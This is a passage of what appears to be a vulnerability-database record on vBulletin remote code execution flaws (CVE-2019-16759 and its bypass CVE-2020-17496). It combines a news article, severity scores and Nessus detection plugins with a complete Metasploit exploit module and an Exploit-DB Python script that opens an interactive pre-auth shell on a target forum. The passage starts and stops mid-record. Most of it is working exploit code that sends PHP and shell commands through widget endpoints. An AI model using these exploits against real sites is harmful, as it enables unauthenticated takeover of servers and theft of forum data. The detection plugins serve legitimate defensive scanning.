proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability in vBulletin\u2014one of the widely used internet forum software, The Hacker News has learned. \n \nOne of the reasons why the vulnerability should be viewed as a severe issue is not just because it is remotely exploitable, but also doesn't require authentication. \n \nWritten in PHP, vBulletin is a widely used proprietary Internet forum software package that powers more than 100,000 websites on the Internet, including Fortune 500 and Alexa Top 1 million companies websites and forums. \n \nAccording to details [published](<https://seclists.org/fulldisclosure/2019/Sep/31>) on the Full Disclosure mailing list, the hacker claims to have found a remote code execution vulnerability that appears to affect vBulletin versions 5.0.0 till the latest 5.5.4. \n \nThe Hacker News has independently verified that the flaw works, as described, and affects the latest version of vBulletin software, which eventually leaves thousands of forum websites at risk of hacking. \n \nThe vulnerability resides in the way an internal widget file of the forum software package accepts configurations via the URL parameters and then parse them on the server without proper safety checks, allowing attackers to inject commands and remotely execute code on the system. \n \n\n\n[](<https://thehackernews.com/images/-2sdYToJLaQQ/XYpkqgFI9EI/AAAAAAAA1M4/w0VDwMRiNfoZfFRP-fR9ZzojmphmDU9WQCLcBGAsYHQ/s728-e100/vBulletin-exploit.jpg>)\n\n \nAs a proof-of-concept, the hacker has also released a python-based exploit that could make it easier for anyone to exploit the zero-day in the wild. \n \nSo far, the Common Vulnerabilities and Exposures (CVE) number has not been assigned to the vulnerability. \n \nThe Hacker News has also informed vBulletin project maintainers about the vulnerability disclosure and expect them to patch the security issue before hackers start exploiting it to target vBulletin installations. \n \nA separate cybersecurity researcher analyzed the [core reason of this vulnerability](<https://gist.github.com/jamesbercegay/a8f169059c6184e76b12d98d887542b3>) and posted details soon after The Hacker News publish the article. \n \nMeanwhile, a GitHub user also released a [simple script](<https://github.com/Frint0/mass-pwn-vbulletin>) that could let anyone scan the Internet to find vBulletin websites using Shodan search engine and automatically check for vulnerable sites. \n \nWe will update the article and inform the readers via social media as soon as we hear back from the vBulletin maintainers. \n \n\n\n## Update \u2014 Hackers Actively Exploiting vBulletin Zero-Day; Patches Now Available\n\n \nAccording to multiple infosec community sources in contact with The Hacker News, various hacking groups and individual bug hunters have already started scanning the Internet to target vulnerable vBulletin websites. \n \nAfter The Hacker News broke the news and informed the vBulletin team about the zero-day public disclosure, now tracked as CVE-2019-16759, the project maintainers today released [security patches for vBulletin](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4?patch>) versions 5.5.2, 5.5.3, and 5.5.4.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-24T18:57:00", "type": "thn", "title": "[Unpatched] Critical 0-Day RCE Exploit for vBulletin Forum Disclosed Publicly", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T06:48:12", "id": "THN:3C66A5BF1D6CB09FB0A4CEB90614BEC0", "href": "https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-04T02:56:50", "description": "This module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. This causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-09T22:38:52", "type": "metasploit", "title": "vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-05-13T03:01:03", "id": "MSF:EXPLOIT-MULTI-HTTP-VBULLETIN_WIDGET_TEMPLATE_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_widget_template_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',\n 'Description' => %q{\n This module exploits a logic bug within the template rendering code in vBulletin 5.x.\n The module uses the vBulletin template rendering functionality to render the\n 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\n This causes the former template to load the latter bypassing filters originally put in place\n to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\n allowing the module to achieve PHP remote code execution on the target. This module has been\n tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n },\n 'Author' => [\n 'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module\n ],\n 'References' => [\n ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],\n ['CVE', '2020-17496']\n ],\n 'DisclosureDate' => '2020-08-09',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'windows'],\n 'Arch' => [ARCH_CMD, ARCH_PHP],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Meterpreter (PHP In-Memory)',\n {\n 'Platform' => 'php',\n 'Arch' => [ARCH_PHP],\n 'Type' => :php_memory,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => false\n }\n }\n ],\n [\n 'Unix (CMD In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => true\n }\n }\n ],\n [\n 'Windows (CMD In-Memory)',\n {\n 'Platform' => 'windows',\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'DisablePayloadHandler' => true\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\n ])\n end\n\n def cmd_payload(command)\n \"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\"\n end\n\n def execute_command(command)\n response = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),\n 'encode_params' => true,\n 'vars_post' => {\n 'subWidgets[0][template]' => 'widget_php',\n 'subWidgets[0][config][code]' => command\n }\n })\n if response && response.body\n return response\n end\n\n false\n end\n\n def check\n rand_str = Rex::Text.rand_text_alpha(8)\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\n if received && received.body.include?(rand_str)\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n case target['Type']\n when :unix_cmd, :windows_cmd\n cmd = cmd_payload(payload.encoded)\n vprint_status(\"Generated command payload: #{cmd}\")\n\n received = execute_command(cmd)\n if received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\n print_warning('Dumping command output in body response')\n if received.body.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(received.body.to_s)\n end\n\n when :php_memory\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vbulletin_widget_template_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-15T15:19:43", "description": "The version of vBulletin running on the remote host is affected by an input-validation flaw in the 'widgetConfig' parameter to the script 'ajax/render/widget_php' that allows command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-23T00:00:00", "type": "nessus", "title": "vBulletin 'widget_php' Command Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:vbulletin:vbulletin"], "id": "VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/130168", "sourceData": "#%NASL_MIN_LEVEL 70300\n# \n# (C) Tenable Network Security, Inc. \n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130168);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-16759\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"vBulletin 'widget_php' Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has a\ncommand execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an\ninput-validation flaw in the 'widgetConfig' parameter to the script\n'ajax/render/widget_php' that allows command execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2019/Sep/31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vBulletin 5.5.4 P1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-16759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'vBulletin widgetConfig RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/render/widget_php';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'widgetConfig[code]=echo pi();',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),\n port:port,\n exit_on_fail:TRUE\n);\n\nif (\"3.14159265358\" >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"vBulletin\", build_url(port:port,qs:dir));\n\npi_pos = stridx(res[2], \"3.14159265358\");\nres_proof = substr(res[2], pi_pos - 100, pi_pos + 100);\n\nreport = get_vuln_report(\n items:http_last_sent_request(),\n port:port,\n trailer:'\\n' +\n 'The above request resulted in the following output :' +\n '\\n\\n' +\n res_proof\n);\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:28:10", "description": "The instance of vBulletin running on the remote host is affected by a command execution vulnerability. A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute commands on the remote host. All versions of vBulletin prior to the 5.6.x branch are considered vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-17T00:00:00", "type": "nessus", "title": "vBulletin < 5.6.2 Patch Level 1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2021-09-07T00:00:00", "cpe": ["cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98764", "href": "https://www.tenable.com/plugins/was/98764", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-15T14:53:42", "description": "The version of vBulletin running on the remote host is affected by an input-validation flaw in the ajax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for CVE-2019-16759.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-10T00:00:00", "type": "nessus", "title": "vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vbulletin:vbulletin"], "id": "VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/139457", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139457);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-16759\", \"CVE-2020-17496\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0092\");\n\n script_name(english:\"vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an input-validation flaw in the\najax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for\nCVE-2019-16759.\");\n # https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62dedb88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP widgets or contact the vendor.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17496\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/render/widget_tabbedcontainer_tab_panel';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo(\\'crc32(\"Nessus\")=\\'.crc32(\\'Nessus\\'));',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),\n port:port,\n exit_on_fail:TRUE\n);\n\n# CRC32('Nessus') is 1631274700\nif ('1631274700' >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'vBulletin', build_url(port:port,qs:dir));\n\nreport =\n 'Nessus was able to verify the issue using the following request :\\n\\n' +\n http_last_sent_request() + '\\n\\n' +\n 'The above request resulted in the following output :\\n\\n' +\n res[2] + '\\n\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T04:09:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-12T00:00:00", "type": "exploitdb", "title": "vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2020-08-12T00:00:00", "id": "EDB-ID:48743", "href": "https://www.exploit-db.com/exploits/48743", "sourceData": "# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\r\n# Date: 2020-08-09\r\n# Exploit Author: @zenofex\r\n# Vendor Homepage: https://www.vbulletin.com/\r\n# Software Link: None\r\n# Version: 5.4.5 through 5.6.2\r\n# Tested on: vBulletin 5.6.2 on Ubuntu 19.04\r\n# CVE : None\r\n\r\n# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code\r\n# execution vulnerability caused by incomplete patching of the previous\r\n# \"CVE-2019-16759\" RCE. This logic bug allows for a single pre-auth\r\n# request to execute PHP code on a target vBulletin forum.\r\n\r\n#More info can be found at:\r\n#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\r\n\r\n\r\n#!/usr/bin/env python3\r\n# vBulletin 5.x pre-auth widget_tabbedContainer_tab_panel RCE exploit by @zenofex\r\n\r\nimport argparse\r\nimport requests\r\nimport sys\r\n\r\ndef run_exploit(vb_loc, shell_cmd):\r\n post_data = {'subWidgets[0][template]' : 'widget_php', 'subWidgets[0][config][code]' : \"echo shell_exec('%s'); exit;\" % shell_cmd}\r\n r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)\r\n return r.text\r\n\r\nap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')\r\nap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')\r\nARGS = ap.parse_args()\r\n\r\nwhile True:\r\n try:\r\n cmd = input(\"vBulletin5$ \")\r\n print(run_exploit(ARGS.location, cmd))\r\n except KeyboardInterrupt:\r\n sys.exit(\"\\nClosing shell...\")\r\n except Exception as e:\r\n sys.exit(str(e))", "sourceHref": "https://www.exploit-db.com/download/48743", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:08:49", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-30T00:00:00", "type": "exploitdb", "title": "vBulletin 5.x - Remote Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-16759", "CVE-2019-16759"], "modified": "2019-09-30T00:00:00", "id": "EDB-ID:47437", "href": "https://www.exploit-db.com/exploits/47437", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'vBulletin 5.x 0day pre-quth RCE exploit',\r\n 'Description' => %q{\r\n vBulletin 5.x 0day pre-auth RCE exploit.\r\n This should work on all versions from 5.0.0 till 5.5.4\r\n },\r\n 'Platform' => 'php',\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Reported by: anonymous', # reported by\r\n 'Original exploit by: anonymous', # original exploit\r\n 'Metasploit mod by: r00tpgp', # metasploit module\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x22\",\r\n },\r\n 'References' =>\r\n [\r\n ['CVE', 'CVE-2019-16759'],\r\n ['EDB', 'NA'],\r\n ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],\r\n ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759']\r\n ],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [\r\n [ 'Automatic Targeting', { 'auto' => true } ],\r\n # ['vBulletin 5.0.X', {'chain' => 'vB_Database'}],\r\n # ['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}],\r\n ],\r\n 'DisclosureDate' => 'Sep 23 2019',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', 